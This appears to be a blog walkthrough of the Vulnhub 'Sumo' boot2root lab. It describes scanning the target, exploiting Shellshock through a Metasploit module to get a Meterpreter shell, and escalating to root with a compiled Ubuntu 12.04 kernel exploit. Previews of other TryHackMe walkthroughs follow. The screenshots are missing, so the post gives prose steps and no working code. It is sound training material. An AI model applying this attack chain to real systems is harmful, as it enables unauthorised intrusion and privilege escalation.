Sumo Walkthrough

Introduction

Today, we're going to be doing a boot2root walkthough of the Sumo machine, created by the SunCSR Team, and hosted on Vulnhub, at https://www.vulnhub.com/entry/sumo-1,480/ .  We'll be using two virtual machines for this walkthrough, our attacking Kali Linux machine, and the target Sumo machine. 

Locating the Target

First, let's locate the target machine on the network using netdiscover:


It seems like 10.0.2.7 is out target.

Scanning and Enumeration

Let's start our scans with a quick Nmap scan to see which TCP ports are open.




Just a couple of open ports.  We'll also run the same sort of scan for UDP ports.



Nothing there.  Let's do an in-depth scan with Nmap on the open ports that we found.
We're able to glean a couple of details from this scan, the web server is Apache 2.2.22, the SSH being used is OpenSSH 5.9p1, and the OS is probably Linux, estimated to be Ubuntu.

Next, we'll run a Nikto scan against the target's web server:



The web server appears to be vulnerable to ‘shellshock’, so that's going to be something we look into after our scans are done.

Finally, we'll use Nessus to scan for vulnerabilities:







Finding a Way In

From the look of the Nessus results, we're confident that Shellshock is something we need to look into as a way to exploit the target, in addition to an exploit associated with the outdated version of Ubuntu the target is running. An unsupported OS version vulnerability probably leads to privilege escalation exploits, so we'll investigate that later. We take note of the CVE number for Shellshock (2014-6271 and 2014-6278) and plug this into Metasploit to look for something we can use:


We recall that our Nikto scan revealed the path to the CGI directory on the web server, so we'll look at the 5th entry on this list, then check what information we need for the module:


Looks like we'll need to supply this module with the target's IP address and the path to a CGI script in order to run it. After setting the variables and the payload, the settings look like this:


We run the exploit and a Meterpreter session opens up for us:


Privilege Escalation

Now that we have a shell on the target system, we can look for an exploit associated with the outdated OS version (Ubuntu 12.04). 


This one fits, so we can download the exploit, then upload the file to the target using the Meterpreter shell:









We then drop from our Meterpreter into a shell, upgrade our shell using a Python one-liner, then navigate to the /tmp/ directory where our exploit code is.


Now to compile the exploit using GCC, then execute the exploit.


Success! We have elevated ourselves to root. Now all that's left is to find the target's flag, which the documentation for this machine says is in the /root/ directory.


And that's it.

Summary

After our initial scans, there were two potentially vulnerable issues presented to us: the outdated OS version (Ubuntu 12.04), and the vulnerability of the target to Shellshock. Using a discovered path to the cgi directory of the web server, we were able to use a Metasploit module to gain a remote shell to the system, which allowed us to upload OS exploitation code to the target and gain root access.

Finish

Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more